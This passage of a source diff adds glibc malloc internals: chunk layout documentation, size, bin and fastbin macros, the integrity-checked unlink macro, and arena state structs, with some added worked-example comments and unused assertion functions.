+  struct malloc_chunk* bk_nextsize;
+};
+
+
+/*
+   malloc_chunk details:
+
+    (The following includes lightly edited explanations by Colin Plumb.)
+
+    Chunks of memory are maintained using a `boundary tag' method as
+    described in e.g., Knuth or Standish.  (See the paper by Paul
+    Wilson ftp://ftp.cs.utexas.edu/pub/garbage/allocsrv.ps for a
+    survey of such techniques.)  Sizes of free chunks are stored both
+    in the front of each chunk and at the end.  This makes
+    consolidating fragmented chunks into bigger chunks very fast.  The
+    size fields also hold bits representing whether chunks are free or
+    in use.
+
+    An allocated chunk looks like this:
+
+
+    chunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of previous chunk, if unallocated (P clear)  |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of chunk, in bytes                     |A|M|P|
+      mem-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             User data starts here...                          .
+	    .                                                               .
+	    .             (malloc_usable_size() bytes)                      .
+	    .                                                               |
+nextchunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             (size of chunk, but used for application data)    |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of next chunk, in bytes                |A|0|1|
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+
+    Where "chunk" is the front of the chunk for the purpose of most of
+    the malloc code, but "mem" is the pointer that is returned to the
+    user.  "Nextchunk" is the beginning of the next contiguous chunk.
+
+    Chunks always begin on even word boundaries, so the mem portion
+    (which is returned to the user) is also on an even word boundary, and
+    thus at least double-word aligned.
+
+    Free chunks are stored in circular doubly-linked lists, and look like this:
+
+    chunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of previous chunk, if unallocated (P clear)  |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+    `head:' |             Size of chunk, in bytes                     |A|0|P|
+      mem-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Forward pointer to next chunk in list             |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Back pointer to previous chunk in list            |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Unused space (may be 0 bytes long)                .
+	    .                                                               .
+	    .                                                               |
+nextchunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+    `foot:' |             Size of chunk, in bytes                           |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of next chunk, in bytes                |A|0|0|
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+
+    The P (PREV_INUSE) bit, stored in the unused low-order bit of the
+    chunk size (which is always a multiple of two words), is an in-use
+    bit for the *previous* chunk.  If that bit is *clear*, then the
+    word before the current chunk size contains the previous chunk
+    size, and can be used to find the front of the previous chunk.
+    The very first chunk allocated always has this bit set,
+    preventing access to non-existent (or non-owned) memory. If
+    prev_inuse is set for any given chunk, then you CANNOT determine
+    the size of the previous chunk, and might even get a memory
+    addressing fault when trying to do so.
+
+    The A (NON_MAIN_ARENA) bit is cleared for chunks on the initial,
+    main arena, described by the main_arena variable.  When additional
+    threads are spawned, each thread receives its own arena (up to a
+    configurable limit, after which arenas are reused for multiple
+    threads), and the chunks in these arenas have the A bit set.  To
+    find the arena for a chunk on such a non-main arena, heap_for_ptr
+    performs a bit mask operation and indirection through the ar_ptr
+    member of the per-heap header heap_info (see arena.c).
+
+    Note that the `foot' of the current chunk is actually represented
+    as the prev_size of the NEXT chunk. This makes it easier to
+    deal with alignments etc but can be very confusing when trying
+    to extend or adapt this code.
+
+    The three exceptions to all this are:
+
+     1. The special chunk `top' doesn't bother using the
+	trailing size field since there is no next contiguous chunk
+	that would have to index off it. After initialization, `top'
+	is forced to always exist.  If it would become less than
+	MINSIZE bytes long, it is replenished.
+
+     2. Chunks allocated via mmap, which have the second-lowest-order
+	bit M (IS_MMAPPED) set in their size fields.  Because they are
+	allocated one-by-one, each must contain its own trailing size
+	field.  If the M bit is set, the other bits are ignored
+	(because mmapped chunks are neither in an arena, nor adjacent
+	to a freed chunk).  The M bit is also used for chunks which
+	originally came from a dumped heap via malloc_set_state in
+	hooks.c.
+
+     3. Chunks in fastbins are treated as allocated chunks from the
+	point of view of the chunk allocator.  They are consolidated
+	with their neighbors only in bulk, in malloc_consolidate.
+*/
+
+/*
+  ---------- Size and alignment checks and conversions ----------
+*/
+
+/* conversion from malloc headers to user pointers, and back */
+
+#define chunk2mem(p)   ((void*)((char*)(p) + 2*SIZE_SZ))
+#define mem2chunk(mem) ((mchunkptr)((char*)(mem) - 2*SIZE_SZ))
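+
+/* Worked example (64-bit build, SIZE_SZ == 8): chunk2mem (p) is
+   (char *) p + 16, i.e. the pointer handed to the application skips the
+   prev_size and size words of the header, and mem2chunk (chunk2mem (p)) == p.
+   On a 32-bit build the offset is 8 bytes.  */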
+
+/* The smallest possible chunk */
+#define MIN_CHUNK_SIZE        (offsetof(struct malloc_chunk, fd_nextsize))
+
+/* The smallest size we can malloc is an aligned minimal chunk */
+
+#define MINSIZE  \
+  (unsigned long)(((MIN_CHUNK_SIZE+MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK))
+
+/* Check if m has acceptable alignment */
+
+#define aligned_OK(m)  (((unsigned long)(m) & MALLOC_ALIGN_MASK) == 0)
+
+#define misaligned_chunk(p) \
+  ((uintptr_t)(MALLOC_ALIGNMENT == 2 * SIZE_SZ ? (p) : chunk2mem (p)) \
+   & MALLOC_ALIGN_MASK)
+
+
+/*
+   Check if a request is so large that it would wrap around zero when
+   padded and aligned. To simplify some other code, the bound is made
+   low enough so that adding MINSIZE will also not wrap around zero.
+ */
+
+#define REQUEST_OUT_OF_RANGE(req)                                 \
+  ((unsigned long) (req) >=						      \
+   (unsigned long) (INTERNAL_SIZE_T) (-2 * MINSIZE))
+
+/* pad request bytes into a usable size -- internal version */
+
+#define request2size(req)                                         \
+  (((req) + SIZE_SZ + MALLOC_ALIGN_MASK < MINSIZE)  ?             \
+   MINSIZE :                                                      \
+   ((req) + SIZE_SZ + MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK)
+
+/* Same, except also perform an argument and result check.  First, we check
+   that the padding done by request2size didn't result in an integer
+   overflow.  Then we check (using REQUEST_OUT_OF_RANGE) that the resulting
+   size isn't so large that a later alignment would lead to another integer
+   overflow.  */
+#define checked_request2size(req, sz) \
+({				    \
+  (sz) = request2size (req);	    \
+  if (((sz) < (req))		    \
+      || REQUEST_OUT_OF_RANGE (sz)) \
+    {				    \
+      __set_errno (ENOMEM);	    \
+      return 0;			    \
+    }				    \
+})
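+
+/* Worked examples of the padding above, assuming a 64-bit build with
+   SIZE_SZ == 8, MALLOC_ALIGN_MASK == 15 and MINSIZE == 32:
+
+     request2size (0)   == 32   (0 + 8 + 15 < 32, so MINSIZE is used)
+     request2size (24)  == 32   ((24 + 8 + 15) & ~15)
+     request2size (25)  == 48   ((25 + 8 + 15) & ~15)
+     request2size (100) == 112  ((100 + 8 + 15) & ~15)
+
+   so every usable chunk size is a multiple of 16 and at least MINSIZE.  */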
+
+/*
+   --------------- Physical chunk operations ---------------
+ */
+
+
+/* size field is or'ed with PREV_INUSE when previous adjacent chunk in use */
+#define PREV_INUSE 0x1
+
+/* extract inuse bit of previous chunk */
+#define prev_inuse(p)       ((p)->mchunk_size & PREV_INUSE)
+
+
+/* size field is or'ed with IS_MMAPPED if the chunk was obtained with mmap() */
+#define IS_MMAPPED 0x2
+
+/* check for mmap()'ed chunk */
+#define chunk_is_mmapped(p) ((p)->mchunk_size & IS_MMAPPED)
+
+
+/* size field is or'ed with NON_MAIN_ARENA if the chunk was obtained
+   from a non-main arena.  This is only set immediately before handing
+   the chunk to the user, if necessary.  */
+#define NON_MAIN_ARENA 0x4
+
+/* Check for chunk from main arena.  */
+#define chunk_main_arena(p) (((p)->mchunk_size & NON_MAIN_ARENA) == 0)
+
+/* Mark a chunk as not being on the main arena.  */
+#define set_non_main_arena(p) ((p)->mchunk_size |= NON_MAIN_ARENA)
+
+
+/*
+   Bits to mask off when extracting size
+
+   Note: IS_MMAPPED is intentionally not masked off from size field in
+   macros for which mmapped chunks should never be seen. This should
+   cause helpful core dumps to occur if it is tried by accident by
+   people extending or adapting this malloc.
+ */
+#define SIZE_BITS (PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA)
+
+/* Get size, ignoring use bits */
+#define chunksize(p) (chunksize_nomask (p) & ~(SIZE_BITS))
+
+/* Like chunksize, but do not mask SIZE_BITS.  */
+#define chunksize_nomask(p)         ((p)->mchunk_size)
+
+/* Ptr to next physical malloc_chunk. */
+#define next_chunk(p) ((mchunkptr) (((char *) (p)) + chunksize (p)))
+
+/* Size of the chunk below P.  Only valid if !prev_inuse (P).  */
+#define prev_size(p) ((p)->mchunk_prev_size)
+
+/* Set the size of the chunk below P.  Only valid if !prev_inuse (P).  */
+#define set_prev_size(p, sz) ((p)->mchunk_prev_size = (sz))
+
+/* Ptr to previous physical malloc_chunk.  Only valid if !prev_inuse (P).  */
+#define prev_chunk(p) ((mchunkptr) (((char *) (p)) - prev_size (p)))
+
+/* Treat space at ptr + offset as a chunk */
+#define chunk_at_offset(p, s)  ((mchunkptr) (((char *) (p)) + (s)))
+
+/* extract p's inuse bit */
+#define inuse(p)							      \
+  ((((mchunkptr) (((char *) (p)) + chunksize (p)))->mchunk_size) & PREV_INUSE)
+
+/* set/clear chunk as being inuse without otherwise disturbing */
+#define set_inuse(p)							      \
+  ((mchunkptr) (((char *) (p)) + chunksize (p)))->mchunk_size |= PREV_INUSE
+
+#define clear_inuse(p)							      \
+  ((mchunkptr) (((char *) (p)) + chunksize (p)))->mchunk_size &= ~(PREV_INUSE)
+
+
+/* check/set/clear inuse bits in known places */
+#define inuse_bit_at_offset(p, s)					      \
+  (((mchunkptr) (((char *) (p)) + (s)))->mchunk_size & PREV_INUSE)
+
+#define set_inuse_bit_at_offset(p, s)					      \
+  (((mchunkptr) (((char *) (p)) + (s)))->mchunk_size |= PREV_INUSE)
+
+#define clear_inuse_bit_at_offset(p, s)					      \
+  (((mchunkptr) (((char *) (p)) + (s)))->mchunk_size &= ~(PREV_INUSE))
+
+
+/* Set size at head, without disturbing its use bit */
+#define set_head_size(p, s)  ((p)->mchunk_size = (((p)->mchunk_size & SIZE_BITS) | (s)))
+
+/* Set size/use field */
+#define set_head(p, s)       ((p)->mchunk_size = (s))
+
+/* Set size at footer (only when chunk is not in use) */
+#define set_foot(p, s)       (((mchunkptr) ((char *) (p) + (s)))->mchunk_prev_size = (s))
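+
+/* Illustrative sketch of how these macros compose when walking a consistent
+   heap (not code used by the allocator itself; assumes p is neither the top
+   chunk nor an mmapped chunk):
+
+     mchunkptr nxt = next_chunk (p);        (char *) p + chunksize (p)
+     if (!prev_inuse (nxt))
+       assert (prev_size (nxt) == chunksize (p));   p is free, so its size
+                                                    is mirrored in its footer
+     if (!prev_inuse (p))
+       p = prev_chunk (p);                  step back; valid only when the
+                                            P bit of p is clear
+*/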
+
+
+#pragma GCC poison mchunk_size
+#pragma GCC poison mchunk_prev_size
+
+/*
+   -------------------- Internal data structures --------------------
+
+   All internal state is held in an instance of malloc_state defined
+   below. There are no other static variables, except in two optional
+   cases:
+ * If USE_MALLOC_LOCK is defined, the mALLOC_MUTEx declared above.
+ * If mmap doesn't support MAP_ANONYMOUS, a dummy file descriptor
+     for mmap.
+
+   Beware of lots of tricks that minimize the total bookkeeping space
+   requirements. The result is a little over 1K bytes (for 4byte
+   pointers and size_t.)
+ */
+
+/*
+   Bins
+
+    An array of bin headers for free chunks. Each bin is doubly
+    linked.  The bins are approximately proportionally (log) spaced.
+    There are a lot of these bins (128). This may look excessive, but
+    works very well in practice.  Most bins hold sizes that are
+    unusual as malloc request sizes, but are more usual for fragments
+    and consolidated sets of chunks, which is what these bins hold, so
+    they can be found quickly.  All procedures maintain the invariant
+    that no consolidated chunk physically borders another one, so each
+    chunk in a list is known to be preceded and followed by either
+    inuse chunks or the ends of memory.
+
+    Chunks in bins are kept in size order, with ties going to the
+    approximately least recently used chunk. Ordering isn't needed
+    for the small bins, which all contain the same-sized chunks, but
+    facilitates best-fit allocation for larger chunks. These lists
+    are just sequential. Keeping them in order almost never requires
+    enough traversal to warrant using fancier ordered data
+    structures.
+
+    Chunks of the same size are linked with the most
+    recently freed at the front, and allocations are taken from the
+    back.  This results in LRU (FIFO) allocation order, which tends
+    to give each chunk an equal opportunity to be consolidated with
+    adjacent freed chunks, resulting in larger free chunks and less
+    fragmentation.
+
+    To simplify use in double-linked lists, each bin header acts
+    as a malloc_chunk. This avoids special-casing for headers.
+    But to conserve space and improve locality, we allocate
+    only the fd/bk pointers of bins, and then use repositioning tricks
+    to treat these as the fields of a malloc_chunk*.
+ */
+
+typedef struct malloc_chunk *mbinptr;
+
+/* addressing -- note that bin_at(0) does not exist */
+#define bin_at(m, i) \
+  (mbinptr) (((char *) &((m)->bins[((i) - 1) * 2]))			      \
+             - offsetof (struct malloc_chunk, fd))
+
+/* analog of ++bin */
+#define next_bin(b)  ((mbinptr) ((char *) (b) + (sizeof (mchunkptr) << 1)))
+
+/* Reminders about list directionality within bins */
+#define first(b)     ((b)->fd)
+#define last(b)      ((b)->bk)
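+
+/* Worked example (64-bit): offsetof (struct malloc_chunk, fd) == 0x10 and
+   each bin occupies two pointers in the bins[] array, so
+
+     bin_at (m, i) == (mbinptr) ((char *) &m->bins[(i - 1) * 2] - 0x10)
+
+   which means bin_at (m, i)->fd aliases bins[(i - 1) * 2] and
+   bin_at (m, i)->bk aliases bins[(i - 1) * 2 + 1].  Only the fd and bk
+   fields of a bin header may ever be touched; this is the repositioning
+   trick described above.  */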
+
+/* Take a chunk off a bin list */
+#define unlink(AV, P, BK, FD) {                                            \
+    if (__builtin_expect (chunksize(P) != prev_size (next_chunk(P)), 0))      \
+      malloc_printerr ("corrupted size vs. prev_size");			      \
+    FD = P->fd;								      \
+    BK = P->bk;								      \
+    if (__builtin_expect (FD->bk != P || BK->fd != P, 0))		      \
+      malloc_printerr ("corrupted double-linked list");			      \
+    else {								      \
+        FD->bk = BK;							      \
+        BK->fd = FD;							      \
+        if (!in_smallbin_range (chunksize_nomask (P))			      \
+            && __builtin_expect (P->fd_nextsize != NULL, 0)) {		      \
+	    if (__builtin_expect (P->fd_nextsize->bk_nextsize != P, 0)	      \
+		|| __builtin_expect (P->bk_nextsize->fd_nextsize != P, 0))    \
+	      malloc_printerr ("corrupted double-linked list (not small)");   \
+            if (FD->fd_nextsize == NULL) {				      \
+                if (P->fd_nextsize == P)				      \
+                  FD->fd_nextsize = FD->bk_nextsize = FD;		      \
+                else {							      \
+                    FD->fd_nextsize = P->fd_nextsize;			      \
+                    FD->bk_nextsize = P->bk_nextsize;			      \
+                    P->fd_nextsize->bk_nextsize = FD;			      \
+                    P->bk_nextsize->fd_nextsize = FD;			      \
+                  }							      \
+              } else {							      \
+                P->fd_nextsize->bk_nextsize = P->bk_nextsize;		      \
+                P->bk_nextsize->fd_nextsize = P->fd_nextsize;		      \
+              }								      \
+          }								      \
+      }									      \
+}
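+
+/* Illustrative sketch of the list surgery performed by unlink: for a small
+   free chunk P linked as A <-> P <-> B (A == P->bk, B == P->fd), the macro
+   first checks that P's size matches the prev_size footer stored in its
+   physical successor and that B->bk == P and A->fd == P, then rewrites
+
+     B->bk = A;
+     A->fd = B;
+
+   leaving A <-> B.  For large chunks the fd_nextsize/bk_nextsize skip list
+   is patched analogously.  */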
+
+/*
+   Indexing
+
+    Bins for sizes < 512 bytes contain chunks of all the same size, spaced
+    8 bytes apart. Larger bins are approximately logarithmically spaced:
+
+    64 bins of size       8
+    32 bins of size      64
+    16 bins of size     512
+     8 bins of size    4096
+     4 bins of size   32768
+     2 bins of size  262144
+     1 bin  of size what's left
+
+    There is actually a little bit of slop in the numbers in bin_index
+    for the sake of speed. This makes no difference elsewhere.
+
+    The bins top out around 1MB because we expect to service large
+    requests via mmap.
+
+    Bin 0 does not exist.  Bin 1 is the unordered list; if that would be
+    a valid chunk size the small bins are bumped up one.
+ */
+
+#define NBINS             128
+#define NSMALLBINS         64
+#define SMALLBIN_WIDTH    MALLOC_ALIGNMENT
+#define SMALLBIN_CORRECTION (MALLOC_ALIGNMENT > 2 * SIZE_SZ)
+#define MIN_LARGE_SIZE    ((NSMALLBINS - SMALLBIN_CORRECTION) * SMALLBIN_WIDTH)
+
+#define in_smallbin_range(sz)  \
+  ((unsigned long) (sz) < (unsigned long) MIN_LARGE_SIZE)
+
+#define smallbin_index(sz) \
+  ((SMALLBIN_WIDTH == 16 ? (((unsigned) (sz)) >> 4) : (((unsigned) (sz)) >> 3))\
+   + SMALLBIN_CORRECTION)
+
+#define largebin_index_32(sz)                                                \
+  (((((unsigned long) (sz)) >> 6) <= 38) ?  56 + (((unsigned long) (sz)) >> 6) :\
+   ((((unsigned long) (sz)) >> 9) <= 20) ?  91 + (((unsigned long) (sz)) >> 9) :\
+   ((((unsigned long) (sz)) >> 12) <= 10) ? 110 + (((unsigned long) (sz)) >> 12) :\
+   ((((unsigned long) (sz)) >> 15) <= 4) ? 119 + (((unsigned long) (sz)) >> 15) :\
+   ((((unsigned long) (sz)) >> 18) <= 2) ? 124 + (((unsigned long) (sz)) >> 18) :\
+   126)
+
+#define largebin_index_32_big(sz)                                            \
+  (((((unsigned long) (sz)) >> 6) <= 45) ?  49 + (((unsigned long) (sz)) >> 6) :\
+   ((((unsigned long) (sz)) >> 9) <= 20) ?  91 + (((unsigned long) (sz)) >> 9) :\
+   ((((unsigned long) (sz)) >> 12) <= 10) ? 110 + (((unsigned long) (sz)) >> 12) :\
+   ((((unsigned long) (sz)) >> 15) <= 4) ? 119 + (((unsigned long) (sz)) >> 15) :\
+   ((((unsigned long) (sz)) >> 18) <= 2) ? 124 + (((unsigned long) (sz)) >> 18) :\
+   126)
+
+// XXX It remains to be seen whether it is good to keep the widths of
+// XXX the buckets the same or whether it should be scaled by a factor
+// XXX of two as well.
+#define largebin_index_64(sz)                                                \
+  (((((unsigned long) (sz)) >> 6) <= 48) ?  48 + (((unsigned long) (sz)) >> 6) :\
+   ((((unsigned long) (sz)) >> 9) <= 20) ?  91 + (((unsigned long) (sz)) >> 9) :\
+   ((((unsigned long) (sz)) >> 12) <= 10) ? 110 + (((unsigned long) (sz)) >> 12) :\
+   ((((unsigned long) (sz)) >> 15) <= 4) ? 119 + (((unsigned long) (sz)) >> 15) :\
+   ((((unsigned long) (sz)) >> 18) <= 2) ? 124 + (((unsigned long) (sz)) >> 18) :\
+   126)
+
+#define largebin_index(sz) \
+  (SIZE_SZ == 8 ? largebin_index_64 (sz)                                     \
+   : MALLOC_ALIGNMENT == 16 ? largebin_index_32_big (sz)                     \
+   : largebin_index_32 (sz))
+
+#define bin_index(sz) \
+  ((in_smallbin_range (sz)) ? smallbin_index (sz) : largebin_index (sz))
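+
+/* Illustrative sketch, not part of upstream malloc.c: assuming a typical
+   64-bit build (SIZE_SZ == 8, MALLOC_ALIGNMENT == 16, so MIN_LARGE_SIZE
+   is 0x400), a couple of concrete chunk sizes and the bins they map to.  */
+static __attribute__ ((unused)) void
+bin_index_examples (void)
+{
+  /* 0x90 is below MIN_LARGE_SIZE, so it is a small chunk and
+     smallbin_index (0x90) == (0x90 >> 4) == 9.  */
+  assert (in_smallbin_range (0x90) && bin_index (0x90) == 9);
+  /* 0x400 is the first large size: 0x400 >> 6 == 16 <= 48, so
+     largebin_index_64 gives 48 + 16 == 64, the first large bin.  */
+  assert (!in_smallbin_range (0x400) && bin_index (0x400) == 64);
+}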
+
+
+/*
+   Unsorted chunks
+
+    All remainders from chunk splits, as well as all returned chunks,
+    are first placed in the "unsorted" bin. They are then placed
+    in regular bins after malloc gives them ONE chance to be used before
+    binning. So, basically, the unsorted_chunks list acts as a queue,
+    with chunks being placed on it in free (and malloc_consolidate),
+    and taken off (to be either used or placed in bins) in malloc.
+
+    The NON_MAIN_ARENA flag is never set for unsorted chunks, so it
+    does not have to be taken into account in size comparisons.
+ */
+
+/* The otherwise unindexable 1-bin is used to hold unsorted chunks. */
+#define unsorted_chunks(M)          (bin_at (M, 1))
+
+/*
+   Top
+
+    The top-most available chunk (i.e., the one bordering the end of
+    available memory) is treated specially. It is never included in
+    any bin, is used only if no other chunk is available, and is
+    released back to the system if it is very large (see
+    M_TRIM_THRESHOLD).  Because top initially
+    points to its own bin with initial zero size, thus forcing
+    extension on the first malloc request, we avoid having any special
+    code in malloc to check whether it even exists yet. But we still
+    need to do so when getting memory from system, so we make
+    initial_top treat the bin as a legal but unusable chunk during the
+    interval between initialization and the first call to
+    sysmalloc. (This is somewhat delicate, since it relies on
+    the 2 preceding words to be zero during this interval as well.)
+ */
+
+/* Conveniently, the unsorted bin can be used as dummy top on first call */
+#define initial_top(M)              (unsorted_chunks (M))
+
+/*
+   Binmap
+
+    To help compensate for the large number of bins, a one-level index
+    structure is used for bin-by-bin searching.  `binmap' is a
+    bitvector recording whether bins are definitely empty so they can
+    be skipped over during traversals.  The bits are NOT always
+    cleared as soon as bins are empty, but instead only
+    when they are noticed to be empty during traversal in malloc.
+ */
+
+/* Conservatively use 32 bits per map word, even if on 64bit system */
+#define BINMAPSHIFT      5
+#define BITSPERMAP       (1U << BINMAPSHIFT)
+#define BINMAPSIZE       (NBINS / BITSPERMAP)
+
+#define idx2block(i)     ((i) >> BINMAPSHIFT)
+#define idx2bit(i)       ((1U << ((i) & ((1U << BINMAPSHIFT) - 1))))
+
+#define mark_bin(m, i)    ((m)->binmap[idx2block (i)] |= idx2bit (i))
+#define unmark_bin(m, i)  ((m)->binmap[idx2block (i)] &= ~(idx2bit (i)))
+#define get_binmap(m, i)  ((m)->binmap[idx2block (i)] & idx2bit (i))
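+
+/* Illustrative sketch, not part of upstream malloc.c: how a bin index is
+   split into a binmap word and a bit.  Bin 70 lives in map word
+   70 >> 5 == 2 at bit 70 & 31 == 6, so mark_bin (m, 70) would set bit
+   0x40 of m->binmap[2].  */
+static __attribute__ ((unused)) void
+binmap_index_example (void)
+{
+  assert (idx2block (70) == 2);
+  assert (idx2bit (70) == (1U << 6));
+}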
+
+/*
+   Fastbins
+
+    An array of lists holding recently freed small chunks.  Fastbins
+    are not doubly linked.  It is faster to single-link them, and
+    since chunks are never removed from the middles of these lists,
+    double linking is not necessary. Also, unlike regular bins, they
+    are not even processed in FIFO order (they use faster LIFO) since
+    ordering doesn't much matter in the transient contexts in which
+    fastbins are normally used.
+
+    Chunks in fastbins keep their inuse bit set, so they cannot
+    be consolidated with other free chunks. malloc_consolidate
+    releases all chunks in fastbins and consolidates them with
+    other free chunks.
+ */
+
+typedef struct malloc_chunk *mfastbinptr;
+#define fastbin(ar_ptr, idx) ((ar_ptr)->fastbinsY[idx])
+
+/* offset 2 to use otherwise unindexable first 2 bins */
+#define fastbin_index(sz) \
+  ((((unsigned int) (sz)) >> (SIZE_SZ == 8 ? 4 : 3)) - 2)
+
+
+/* The maximum fastbin request size we support */
+#define MAX_FAST_SIZE     (80 * SIZE_SZ / 4)
+
+#define NFASTBINS  (fastbin_index (request2size (MAX_FAST_SIZE)) + 1)
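+
+/* Illustrative sketch, not part of upstream malloc.c: assuming a 64-bit
+   build (SIZE_SZ == 8), the smallest chunk size 0x20 maps to fastbin 0,
+   MAX_FAST_SIZE works out to 160, request2size (160) is 0xb0, and so
+   NFASTBINS is 10.  */
+static __attribute__ ((unused)) void
+fastbin_index_example (void)
+{
+  assert (fastbin_index (0x20) == 0);
+  assert (MAX_FAST_SIZE == 160);
+  assert (NFASTBINS == 10);
+}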
+
+/*
+   FASTBIN_CONSOLIDATION_THRESHOLD is the size of a chunk in free()
+   that triggers automatic consolidation of possibly-surrounding
+   fastbin chunks. This is a heuristic, so the exact value should not
+   matter too much. It is defined at half the default trim threshold as a
+   compromise heuristic to only attempt consolidation if it is likely
+   to lead to trimming. However, it is not dynamically tunable, since
+   consolidation reduces fragmentation surrounding large chunks even
+   if trimming is not used.
+ */
+
+#define FASTBIN_CONSOLIDATION_THRESHOLD  (65536UL)
+
+/*
+   NONCONTIGUOUS_BIT indicates that MORECORE does not return contiguous
+   regions.  Otherwise, contiguity is exploited in merging together,
+   when possible, results from consecutive MORECORE calls.
+
+   The initial value comes from MORECORE_CONTIGUOUS, but is
+   changed dynamically if mmap is ever used as an sbrk substitute.
+ */
+
+#define NONCONTIGUOUS_BIT     (2U)
+
+#define contiguous(M)          (((M)->flags & NONCONTIGUOUS_BIT) == 0)
+#define noncontiguous(M)       (((M)->flags & NONCONTIGUOUS_BIT) != 0)
+#define set_noncontiguous(M)   ((M)->flags |= NONCONTIGUOUS_BIT)
+#define set_contiguous(M)      ((M)->flags &= ~NONCONTIGUOUS_BIT)
+
+/* Maximum size of memory handled in fastbins.  */
+static INTERNAL_SIZE_T global_max_fast;
+
+/*
+   Set value of max_fast.
+   Use impossibly small value if 0.
+   Precondition: there are no existing fastbin chunks in the main arena.
+   Since do_check_malloc_state () checks this, we call malloc_consolidate ()
+   before changing max_fast.  Note other arenas will leak their fast bin
+   entries if max_fast is reduced.
+ */
+
+#define set_max_fast(s) \
+  global_max_fast = (((s) == 0)						      \
+                     ? SMALLBIN_WIDTH : ((s + SIZE_SZ) & ~MALLOC_ALIGN_MASK))
+
+static inline INTERNAL_SIZE_T
+get_max_fast (void)
+{
+  /* Tell the GCC optimizers that global_max_fast is never larger
+     than MAX_FAST_SIZE.  This avoids out-of-bounds array accesses in
+     _int_malloc after constant propagation of the size parameter.
+     (The code never executes because malloc preserves the
+     global_max_fast invariant, but the optimizers may not recognize
+     this.)  */
+  if (global_max_fast > MAX_FAST_SIZE)
+    __builtin_unreachable ();
+  return global_max_fast;
+}
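+
+/* Illustrative sketch, not part of upstream malloc.c: assuming a 64-bit
+   build and that the precondition above holds (no live fastbin chunks),
+   set_max_fast rounds its argument plus SIZE_SZ down to a multiple of
+   MALLOC_ALIGNMENT, and an argument of 0 selects the impossibly small
+   SMALLBIN_WIDTH.  */
+static __attribute__ ((unused)) void
+set_max_fast_example (void)
+{
+  set_max_fast (0x80);                  /* (0x80 + 8) & ~0xf == 0x80 */
+  assert (get_max_fast () == 0x80);
+  set_max_fast (0);
+  assert (get_max_fast () == SMALLBIN_WIDTH);
+}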
+
+/*
+   ----------- Internal state representation and initialization -----------
+ */
+
+/*
+   have_fastchunks indicates that there are probably some fastbin chunks.
+   It is set true on entering a chunk into any fastbin, and cleared early in
+   malloc_consolidate.  The value is approximate since it may be set when there
+   are no fastbin chunks, or it may be clear even if there are fastbin chunks
+   available.  Given its sole purpose is to reduce the number of redundant calls to
+   malloc_consolidate, it does not affect correctness.  As a result we can safely
+   use relaxed atomic accesses.
+ */
+
+
+struct malloc_state
+{
+  /* Serialize access.  */
+  __libc_lock_define (, mutex);
+
+  /* Flags (formerly in max_fast).  */
+  int flags;
+
+  /* Set if the fastbin chunks contain recently inserted free blocks.  */
+  /* Note this is a bool but not all targets support atomics on booleans.  */
+  int have_fastchunks;
+
+  /* Fastbins */
+  mfastbinptr fastbinsY[NFASTBINS];
+
+  /* Base of the topmost chunk -- not otherwise kept in a bin */
+  mchunkptr top;
+
+  /* The remainder from the most recent split of a small request */
+  mchunkptr last_remainder;
+
+  /* Normal bins packed as described above */
+  mchunkptr bins[NBINS * 2 - 2];
+
+  /* Bitmap of bins */
+  unsigned int binmap[BINMAPSIZE];
+
+  /* Linked list */
+  struct malloc_state *next;
+
+  /* Linked list for free arenas.  Access to this field is serialized
+     by free_list_lock in arena.c.  */
+  struct malloc_state *next_free;
+
+  /* Number of threads attached to this arena.  0 if the arena is on
+     the free list.  Access to this field is serialized by
+     free_list_lock in arena.c.  */
+  INTERNAL_SIZE_T attached_threads;
+
+  /* Memory allocated from the system in this arena.  */
+  INTERNAL_SIZE_T system_mem;
+  INTERNAL_SIZE_T max_system_mem;
+};
+
+struct malloc_par
+{
+  /* Tunable parameters */
+  unsigned long trim_threshold;
+  INTERNAL_SIZE_T top_pad;
+  INTERNAL_SIZE_T mmap_threshold;
+  INTERNAL_SIZE_T arena_test;
+  INTERNAL_SIZE_T arena_max;
+
+  /* Memory map support */
+  int n_mmaps;
+  int n_mmaps_max;
+  int max_n_mmaps;
+  /* the mmap_threshold is dynamic, until the user sets
+     it manually, at which point we need to disable any
+     dynamic behavior. */
+  int no_dyn_threshold;
+
+  /* Statistics */
+  INTERNAL_SIZE_T mmapped_mem;
+  INTERNAL_SIZE_T max_mmapped_mem;
+
+  /* First address handed out by MORECORE/sbrk.  */
+  char *sbrk_base;
+
+#if USE_TCACHE
+  /* Maximum number of buckets to use.  */
+  size_t tcache_bins;
+  size_t tcache_max_bytes;
+  /* Maximum number of chunks in each bucket.  */
+  size_t tcache_count;
